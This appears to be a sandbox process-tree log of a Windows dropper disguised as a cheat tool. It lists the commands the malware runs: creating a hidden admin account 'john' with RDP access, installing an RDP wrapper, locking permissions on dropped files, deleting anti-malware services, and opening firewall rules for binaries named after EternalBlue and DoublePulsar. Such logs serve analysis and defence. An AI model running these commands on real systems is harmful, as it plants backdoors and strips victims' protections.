C:\Windows\SysWOW64\timeout.exe
timeout 5
5⤵
- Delays execution with timeout.exe
PID:312

C:\ProgramData\install\sys.exe
C:\ProgramData\install\sys.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:1468

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "sys.exe"
3⤵
PID:4044

C:\Windows\SysWOW64\timeout.exe
C:\Windows\system32\timeout.exe 3
4⤵
- Delays execution with timeout.exe
PID:1620

C:\programdata\install\cheat.exe
C:\programdata\install\cheat.exe -pnaxui
2⤵
- Executes dropped EXE
PID:3744

C:\ProgramData\Microsoft\Intel\taskhost.exe
"C:\ProgramData\Microsoft\Intel\taskhost.exe"
3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:664

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1584

C:\Programdata\WindowsTask\winlogon.exe
C:\Programdata\WindowsTask\winlogon.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2736

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C schtasks /query /fo list
6⤵
PID:2392

C:\Windows\SysWOW64\schtasks.exe
schtasks /query /fo list
7⤵
PID:712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig /flushdns
5⤵
PID:4548

C:\Windows\system32\ipconfig.exe
ipconfig /flushdns
6⤵
- Gathers network information
PID:4600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c gpupdate /force
5⤵
PID:4700

C:\Windows\system32\gpupdate.exe
gpupdate /force
6⤵
PID:4784

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
4⤵
PID:3076

C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
5⤵
- Modifies file permissions
PID:1716

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
4⤵
PID:2776

C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
5⤵
- Modifies file permissions
PID:732

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)
4⤵
PID:3092

C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)
5⤵
- Modifies file permissions
PID:1428

C:\programdata\microsoft\intel\R8.exe
C:\programdata\microsoft\intel\R8.exe
4⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:668

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
5⤵
PID:392

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
6⤵
- Modifies registry class
PID:3156

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
7⤵
- Kills process with taskkill
PID:216

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
7⤵
- Kills process with taskkill
PID:1604

C:\Windows\SysWOW64\timeout.exe
timeout 3
7⤵
- Delays execution with timeout.exe
PID:2080

C:\Windows\SysWOW64\chcp.com
chcp 1251
7⤵
PID:4136

C:\rdp\Rar.exe
"Rar.exe" e -p555 db.rar
7⤵
- Executes dropped EXE
PID:4176

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
7⤵
- Kills process with taskkill
PID:4240

C:\Windows\SysWOW64\timeout.exe
timeout 2
7⤵
- Delays execution with timeout.exe
PID:4272

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
7⤵
PID:4852

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
8⤵
PID:4972

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
9⤵
PID:5036

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
9⤵
PID:5068

C:\Windows\SysWOW64\netsh.exe
netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
9⤵
PID:5096

C:\Windows\SysWOW64\net.exe
net.exe user "john" "12345" /add
9⤵
PID:4168

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user "john" "12345" /add
10⤵
PID:4220

C:\Windows\SysWOW64\chcp.com
chcp 1251
9⤵
PID:524

C:\Windows\SysWOW64\net.exe
net localgroup "Администраторы" "John" /add
9⤵
PID:4268

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
10⤵
PID:4244

C:\Windows\SysWOW64\net.exe
net localgroup "Administratorzy" "John" /add
9⤵
PID:4304

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
10⤵
PID:4332

C:\Windows\SysWOW64\net.exe
net localgroup "Administrators" John /add
9⤵
PID:4300

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" John /add
10⤵
PID:4388

C:\Windows\SysWOW64\net.exe
net localgroup "Administradores" John /add
9⤵
PID:4520

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administradores" John /add
10⤵
PID:4488

C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
9⤵
PID:4532

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
10⤵
PID:4436

C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного управления" John /add
9⤵
PID:4556

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
10⤵
PID:4632

C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" John /add
9⤵
PID:4552

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
10⤵
PID:4584

C:\Windows\SysWOW64\net.exe
net localgroup "Usuarios de escritorio remoto" John /add
9⤵
PID:4668

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
10⤵
PID:4596

C:\Windows\SysWOW64\net.exe
net localgroup "Uzytkownicy pulpitu zdalnego" John /add
9⤵
PID:2204

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
10⤵
PID:4768

C:\rdp\RDPWInst.exe
"RDPWInst.exe" -i -o
9⤵
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
PID:4680

C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
10⤵
PID:196

C:\rdp\RDPWInst.exe
"RDPWInst.exe" -w
9⤵
- Executes dropped EXE
PID:4404

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
9⤵
PID:4916

C:\Windows\SysWOW64\net.exe
net accounts /maxpwage:unlimited
9⤵
PID:4132

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts /maxpwage:unlimited
10⤵
PID:4828

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
9⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:4840

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper"
9⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:2416

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\rdp"
9⤵
- Views/modifies file attributes
PID:5084

C:\Windows\SysWOW64\timeout.exe
timeout 2
7⤵
- Delays execution with timeout.exe
PID:4864

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appidsvc
4⤵
PID:2264

C:\Windows\SysWOW64\sc.exe
sc start appidsvc
5⤵
PID:1816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appmgmt
4⤵
PID:4116

C:\Windows\SysWOW64\sc.exe
sc start appmgmt
5⤵
PID:4204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
4⤵
PID:4284

C:\Windows\SysWOW64\sc.exe
sc config appidsvc start= auto
5⤵
PID:4336

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
4⤵
PID:4356

C:\Windows\SysWOW64\sc.exe
sc config appmgmt start= auto
5⤵
PID:4400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete swprv
4⤵
PID:4420

C:\Windows\SysWOW64\sc.exe
sc delete swprv
5⤵
PID:4508

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop mbamservice
4⤵
PID:4432

C:\Windows\SysWOW64\sc.exe
sc stop mbamservice
5⤵
PID:4528

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
4⤵
PID:4592

C:\Windows\SysWOW64\sc.exe
sc stop bytefenceservice
5⤵
PID:4656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
4⤵
PID:4676

C:\Windows\SysWOW64\sc.exe
sc delete bytefenceservice
5⤵
PID:4760

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete mbamservice
4⤵
PID:4904

C:\Windows\SysWOW64\sc.exe
sc delete mbamservice
5⤵
PID:4984

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete crmsvc
4⤵
PID:5116

C:\Windows\SysWOW64\sc.exe
sc delete crmsvc
5⤵
PID:2880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete "windows node"
4⤵
PID:4160

C:\Windows\SysWOW64\sc.exe
sc delete "windows node"
5⤵
PID:4236

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
4⤵
PID:4328

C:\Windows\SysWOW64\sc.exe
sc stop Adobeflashplayer
5⤵
PID:4516

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
4⤵
PID:4792

C:\Windows\SysWOW64\sc.exe
sc delete AdobeFlashPlayer
5⤵
PID:5008

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop MoonTitle
4⤵
PID:2544

C:\Windows\SysWOW64\sc.exe
sc stop MoonTitle
5⤵
PID:4920

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
4⤵
PID:5076

C:\Windows\SysWOW64\sc.exe
sc delete MoonTitle"
5⤵
PID:1968

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
4⤵
PID:3448

C:\Windows\SysWOW64\sc.exe
sc stop clr_optimization_v4.0.30318_64
5⤵
PID:4216

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
4⤵
PID:3648

C:\Windows\SysWOW64\sc.exe
sc delete clr_optimization_v4.0.30318_64"
5⤵
PID:4324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
4⤵
PID:4348

C:\Windows\SysWOW64\sc.exe
sc stop MicrosoftMysql
5⤵
PID:4384

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
4⤵
PID:4396

C:\Windows\SysWOW64\sc.exe
sc delete MicrosoftMysql
5⤵
PID:4560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
4⤵
PID:4368

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state on
5⤵
PID:4572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
4⤵
PID:4444

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
5⤵
PID:4616

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
4⤵
PID:4692

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
5⤵
PID:4992

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
4⤵
PID:4856

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
5⤵
PID:2208

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
4⤵
PID:4932

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
5⤵
PID:5104

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
4⤵
PID:200

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
5⤵
PID:4260

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
4⤵
PID:4264

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
5⤵
PID:4428

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
4⤵
PID:4472

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
5⤵
PID:4576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
4⤵
PID:4980

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
5⤵
PID:4148

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
4⤵
PID:2404

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
5⤵
PID:708

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
4⤵
PID:4292

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
5⤵
PID:4212

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
4⤵
PID:1792

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
5⤵
PID:4172

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
4⤵
PID:4696

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
5⤵
PID:4988

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
4⤵
PID:5048

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
5⤵
PID:4512

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
4⤵
PID:5000

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
5⤵
PID:4628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
4⤵
PID:4580

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
5⤵
PID:2332

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
4⤵
PID:4104

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
5⤵
PID:5020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
4⤵
PID:5016

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
5⤵
PID:3332

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
4⤵
PID:3548

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
5⤵
PID:4252

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
4⤵
PID:4832

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
5⤵
PID:4712

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
4⤵
PID:5112

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
5⤵
PID:4412

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
4⤵
PID:4464

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
5⤵
PID:4652

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
4⤵
PID:2624

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
5⤵
PID:4960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
4⤵
PID:4964

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
5⤵
PID:5092

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
4⤵
PID:4872

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
5⤵
PID:196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
4⤵
PID:4184

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
5⤵
PID:4156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
4⤵
PID:4128

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
5⤵
PID:1896

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
4⤵
PID:568

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
5⤵
PID:4112

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
4⤵
PID:4228

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
5⤵
PID:4416

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
4⤵
PID:4716

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
5⤵
PID:4492

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
4⤵
PID:4636

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
5⤵
PID:4776

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
4⤵
PID:3944

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
5⤵
PID:5108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
4⤵
PID:796

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
5⤵
PID:4544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
4⤵
PID:4084

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
5⤵
PID:4924

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
4⤵
PID:3644

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
5⤵
PID:4708

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
4⤵
PID:4588

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
5⤵
PID:4500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
4⤵
PID:4232

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
5⤵
PID:4344

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
4⤵
PID:4296

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
5⤵
PID:4188

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
4⤵
PID:2740

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
5⤵
PID:4948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
4⤵
PID:4644

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
5⤵
PID:4248

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
4⤵
PID:4608

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
5⤵
PID:4456

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
4⤵
PID:4912

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
5⤵
PID:4308

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
4⤵
PID:3892

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
5⤵
PID:4976

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
4⤵
PID:1536

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
5⤵
PID:4936

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
4⤵
PID:4748

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
5⤵
PID:2744

C:\Windows\SysWOW64\cmd.exe
